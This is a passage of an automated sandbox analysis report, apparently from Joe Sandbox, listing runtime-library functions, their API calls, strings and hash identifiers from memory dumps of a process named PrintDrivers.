                                                                    • Opcode Fuzzy Hash: c89dec89243e602de3999a9be8640af64b61893639f04696883223fb89d42085
                                                                    • Instruction Fuzzy Hash: 1FD19E31D0426A8EEF25DB68C8597BCBFB6BF51310F54409DE889AB282DF354C85CB50
                                                                    Function 005B292D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • __startOneArgErrorHandling.LIBCMT ref: 005B29BD
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1887947839.0000000000581000.00000020.00000001.01000000.00000005.sdmp, Offset: 00580000, based on PE: true
                                                                    • Associated: 00000004.00000002.1887825782.0000000000580000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888180443.00000000005C9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888700844.00000000005DF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888783483.00000000005E3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_580000_PrintDrivers.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorHandling__start
                                                                    • String ID: pow
                                                                    • API String ID: 3213639722-2276729525
                                                                    • Opcode ID: e052afca7cbd1b2ff3fb4d74d1c945f721f922e14079768a705175699426d046
                                                                    • Instruction ID: 491683a92afbbf3e5a60d8e8d5fc3fb960f3f4c4a6623c774ba5ebaad7317dea
                                                                    • Opcode Fuzzy Hash: e052afca7cbd1b2ff3fb4d74d1c945f721f922e14079768a705175699426d046
                                                                    • Instruction Fuzzy Hash: F6519D71A086069ADB167B14CD063FA7F90FB50700F204D29F499822E9EB74ACC8EB57
                                                                    Function 00594C6D Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 182COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1887947839.0000000000581000.00000020.00000001.01000000.00000005.sdmp, Offset: 00580000, based on PE: true
                                                                    • Associated: 00000004.00000002.1887825782.0000000000580000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888180443.00000000005C9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888700844.00000000005DF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888783483.00000000005E3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_580000_PrintDrivers.jbxd
                                                                    Similarity
                                                                    • API ID: __aulldiv
                                                                    • String ID: -$0123456789abcdefghijklmnopqrstuvwxyz
                                                                    • API String ID: 3732870572-1956417402
                                                                    • Opcode ID: 3c5322d5e70628d459b8313d7f4d52eb98350d30f382c786e86119687cd720cc
                                                                    • Instruction ID: d7e213af08c345b4652b19ed34235aa5104a9d5a90afda83067a0ca5aa02b793
                                                                    • Opcode Fuzzy Hash: 3c5322d5e70628d459b8313d7f4d52eb98350d30f382c786e86119687cd720cc
                                                                    • Instruction Fuzzy Hash: 0051CE74A14349AFDF298EA88495FBEBFB9BF4A300F1444AAE491D7241D3748D438F61
                                                                    Function 00586EB0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 148COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1887947839.0000000000581000.00000020.00000001.01000000.00000005.sdmp, Offset: 00580000, based on PE: true
                                                                    • Associated: 00000004.00000002.1887825782.0000000000580000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888180443.00000000005C9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888700844.00000000005DF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888783483.00000000005E3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_580000_PrintDrivers.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: \\?\$\\?\UNC\
                                                                    • API String ID: 0-3019864461
                                                                    • Opcode ID: 612529b0a0848965a5368749960aa90dfaa30016645ed7e546972bfc8b53123c
                                                                    • Instruction ID: 34f4e68ede3c05cebe4964ba24b563fd7a47b72d4fd74a0397ad67ba358f2e31
                                                                    • Opcode Fuzzy Hash: 612529b0a0848965a5368749960aa90dfaa30016645ed7e546972bfc8b53123c
                                                                    • Instruction Fuzzy Hash: C151C570A00209DBDB14EF64D889BEEBFB5FF98304F10451EE911B7291DB75A984CBA4
                                                                    Function 0059F61D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 139COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1887947839.0000000000581000.00000020.00000001.01000000.00000005.sdmp, Offset: 00580000, based on PE: true
                                                                    • Associated: 00000004.00000002.1887825782.0000000000580000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888180443.00000000005C9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888700844.00000000005DF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888783483.00000000005E3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_580000_PrintDrivers.jbxd
                                                                    Similarity
                                                                    • API ID: H_prolog3__swprintf
                                                                    • String ID: %.0Lf
                                                                    • API String ID: 971793590-1402515088
                                                                    • Opcode ID: dd877ba80684419b35a0db012c953ed1eac6062902c6b5ee65ecf9f61e9e954d
                                                                    • Instruction ID: 0f01af3ac6ab02047e3666a0bad15f629b1d9263f7b5bb21865bc44ded75ba1d
                                                                    • Opcode Fuzzy Hash: dd877ba80684419b35a0db012c953ed1eac6062902c6b5ee65ecf9f61e9e954d
                                                                    • Instruction Fuzzy Hash: 0C517C72D00209ABCF05EFD4D849ADD7FB9FF48300F204419F846AB2A1DB399959CB90
                                                                    Function 005A8469 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 005A848E
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1887947839.0000000000581000.00000020.00000001.01000000.00000005.sdmp, Offset: 00580000, based on PE: true
                                                                    • Associated: 00000004.00000002.1887825782.0000000000580000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888180443.00000000005C9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888700844.00000000005DF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888783483.00000000005E3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_580000_PrintDrivers.jbxd
                                                                    Similarity
                                                                    • API ID: EncodePointer
                                                                    • String ID: MOC$RCC
                                                                    • API String ID: 2118026453-2084237596
                                                                    • Opcode ID: 36fec967928da152497e63aded9023765899d8a109de2ffa1b82f153bf34ca57
                                                                    • Instruction ID: 1f717227bf01bd58d43256a530c3c8be6e80c78a4f23ce8ee0caaf4bf84abd05
                                                                    • Opcode Fuzzy Hash: 36fec967928da152497e63aded9023765899d8a109de2ffa1b82f153bf34ca57
                                                                    • Instruction Fuzzy Hash: F3413771D0020AAFCF16DF98CC85AAEBFB5FF49304F148159F91867261E7359A50DB50
                                                                    Function 0059FDF8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1887947839.0000000000581000.00000020.00000001.01000000.00000005.sdmp, Offset: 00580000, based on PE: true
                                                                    • Associated: 00000004.00000002.1887825782.0000000000580000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888180443.00000000005C9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888700844.00000000005DF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888783483.00000000005E3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_580000_PrintDrivers.jbxd
                                                                    Similarity
                                                                    • API ID: H_prolog3___cftoe
                                                                    • String ID: !%x
                                                                    • API String ID: 855520168-1893981228
                                                                    • Opcode ID: c77200ab97471c5d091ca75f2dee3b04e615c0781ad1c7847e13ff18baefafe2
                                                                    • Instruction ID: 1b383f7a2537aeae22f9908bcf28e913d36aa75b82516b39cf72c514987042f2
                                                                    • Opcode Fuzzy Hash: c77200ab97471c5d091ca75f2dee3b04e615c0781ad1c7847e13ff18baefafe2
                                                                    • Instruction Fuzzy Hash: DB313771D1024DABCF04EF94E885AEEBBB9FF48304F100429F504E7252E735AA55CB64
                                                                    Function 005A389D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 93COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1887947839.0000000000581000.00000020.00000001.01000000.00000005.sdmp, Offset: 00580000, based on PE: true
                                                                    • Associated: 00000004.00000002.1887825782.0000000000580000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888180443.00000000005C9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888700844.00000000005DF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888783483.00000000005E3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_580000_PrintDrivers.jbxd
                                                                    Similarity
                                                                    • API ID: H_prolog3___cftoe
                                                                    • String ID: !%x
                                                                    • API String ID: 855520168-1893981228
                                                                    • Opcode ID: cd011dbeeef0f33e75eaaa846553c7383544c8a553f03c37b0a485961a338155
                                                                    • Instruction ID: 5112052f7e56fad0dfad2f87daead293d140944eeb259eff92ec40d1a8286e2c
                                                                    • Opcode Fuzzy Hash: cd011dbeeef0f33e75eaaa846553c7383544c8a553f03c37b0a485961a338155
                                                                    • Instruction Fuzzy Hash: 9D31537191424AAFDF05EF98E885EEEBFB5FF49308F140019F841A7242D778AA45CB64
                                                                    Function 00585C30 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • ConvertSidToStringSidW.ADVAPI32(?,00000000), ref: 00585C76
                                                                    • LocalFree.KERNEL32(00000000,Invalid SID,0000000B,?,00000000,F3F544E4), ref: 00585CE5
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1887947839.0000000000581000.00000020.00000001.01000000.00000005.sdmp, Offset: 00580000, based on PE: true
                                                                    • Associated: 00000004.00000002.1887825782.0000000000580000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888180443.00000000005C9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888700844.00000000005DF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888783483.00000000005E3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_580000_PrintDrivers.jbxd
                                                                    Similarity
                                                                    • API ID: ConvertFreeLocalString
                                                                    • String ID: Invalid SID
                                                                    • API String ID: 3201929900-130637731
                                                                    • Opcode ID: 91dc01df8379995659e4742b5c5d7f9028aa8fd0fdbd5c850c92d8ba97215596
                                                                    • Instruction ID: f20c5e07f025203315d3b86ddf4ef9d72155db2610ef0696ed03e955442498a4
                                                                    • Opcode Fuzzy Hash: 91dc01df8379995659e4742b5c5d7f9028aa8fd0fdbd5c850c92d8ba97215596
                                                                    • Instruction Fuzzy Hash: 08215EB4A046059FDB109F58C819BAFBBF8FB44704F14491EE902A7680E7B5AA058BD0
                                                                    Function 00588630 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 60COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 0058865B
                                                                    • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 005886BE
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1887947839.0000000000581000.00000020.00000001.01000000.00000005.sdmp, Offset: 00580000, based on PE: true
                                                                    • Associated: 00000004.00000002.1887825782.0000000000580000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888180443.00000000005C9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888700844.00000000005DF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888783483.00000000005E3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_580000_PrintDrivers.jbxd
                                                                    Similarity
                                                                    • API ID: std::_$Locinfo::_Locinfo_ctorLockitLockit::_
                                                                    • String ID: bad locale name
                                                                    • API String ID: 3988782225-1405518554
                                                                    • Opcode ID: b85569a865b8623417062126d4760e89fc7f3373942ac1dc36147e61e08eec99
                                                                    • Instruction ID: 3f8e14cf7068e754f0cc1ab869596e2d666943c21e01fd8c752e47098fecc191
                                                                    • Opcode Fuzzy Hash: b85569a865b8623417062126d4760e89fc7f3373942ac1dc36147e61e08eec99
                                                                    • Instruction Fuzzy Hash: DE21AE70805784EED721CF68C904B8ABFF4AB19714F148A9ED49597782D3B5AA04CBA1
                                                                    Function 005BDD3D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1887947839.0000000000581000.00000020.00000001.01000000.00000005.sdmp, Offset: 00580000, based on PE: true
                                                                    • Associated: 00000004.00000002.1887825782.0000000000580000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888180443.00000000005C9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888700844.00000000005DF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888783483.00000000005E3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_580000_PrintDrivers.jbxd
                                                                    Similarity
                                                                    • API ID: _free
                                                                    • String ID: $\
                                                                    • API String ID: 269201875-2177588144
                                                                    • Opcode ID: 1d50bc880929c18c25c0ac31f7f64e24110d88afc0a095b57a9c5933bf09d314
                                                                    • Instruction ID: 8845e424a850c3c69e44786245b847879ef3df3c27b8d9b6fb8b4d846a105ce9
                                                                    • Opcode Fuzzy Hash: 1d50bc880929c18c25c0ac31f7f64e24110d88afc0a095b57a9c5933bf09d314
                                                                    • Instruction Fuzzy Hash: B6F0C8334083156EE7112B65AC46FE77FA8FBC17B4F24003AF94C9A042EA663C0185F1
                                                                    Function 00590735 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 0058FCC0: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,F3F544E4,?,005C5B00,000000FF), ref: 0058FCE5
                                                                      • Part of subcall function 0058FCC0: GetLastError.KERNEL32(?,00000000,F3F544E4,?,005C5B00,000000FF), ref: 0058FCEF
                                                                    • IsDebuggerPresent.KERNEL32(?,?,005DC044), ref: 00590768
                                                                    • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,005DC044), ref: 00590777
                                                                    Strings
                                                                    • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00590772
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1887947839.0000000000581000.00000020.00000001.01000000.00000005.sdmp, Offset: 00580000, based on PE: true
                                                                    • Associated: 00000004.00000002.1887825782.0000000000580000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888180443.00000000005C9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888700844.00000000005DF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888783483.00000000005E3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_580000_PrintDrivers.jbxd
                                                                    Similarity
                                                                    • API ID: CountCriticalDebugDebuggerErrorInitializeLastOutputPresentSectionSpinString
                                                                    • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                    • API String ID: 450123788-631824599
                                                                    • Opcode ID: ac8089a769c1f559984e93d4aed32a206ce6ccaccc364e3b708a13dd7764c114
                                                                    • Instruction ID: e5b0f9487f7050a5ae6e35a911ff4bbe503245f76d6cff333c365392f5b777f7
                                                                    • Opcode Fuzzy Hash: ac8089a769c1f559984e93d4aed32a206ce6ccaccc364e3b708a13dd7764c114
                                                                    • Instruction Fuzzy Hash: 3DE06D742007528FC760AFB4D84CB827EE4FF14714F04891DE886D2680EBB4E808CB92
                                                                    Function 00581F90 Relevance: 5.1, APIs: 4, Instructions: 134memoryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • LocalAlloc.KERNEL32(00000040,?,?,00000004,?,?,00583204,?,?), ref: 00582039
                                                                    • LocalAlloc.KERNEL32(00000040,?,?,00000004,?,?,00583204,?,?), ref: 00582059
                                                                    • LocalFree.KERNEL32(?,?), ref: 005820AF
                                                                    • HeapAlloc.KERNEL32(?,00000000,?,F3F544E4,?,005C5B00,000000FF), ref: 005820FA
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1887947839.0000000000581000.00000020.00000001.01000000.00000005.sdmp, Offset: 00580000, based on PE: true
                                                                    • Associated: 00000004.00000002.1887825782.0000000000580000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888180443.00000000005C9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888700844.00000000005DF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888783483.00000000005E3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_580000_PrintDrivers.jbxd
                                                                    Similarity
                                                                    • API ID: AllocLocal$FreeHeap
                                                                    • String ID:
                                                                    • API String ID: 2162915748-0
                                                                    • Opcode ID: 5299815bbdfdd0ef9aaabc0531de89eb7320ea2944b0d59f54e04373f3e6b463
                                                                    • Instruction ID: fd4b5bf6e134f3d684344924a20daea3a241115cabb871989484e767f2557da7
                                                                    • Opcode Fuzzy Hash: 5299815bbdfdd0ef9aaabc0531de89eb7320ea2944b0d59f54e04373f3e6b463
                                                                    • Instruction Fuzzy Hash: 4441E872600605DFC710AF64D88CA6ABFE9FB85360F24462AF926D7291DB319844C760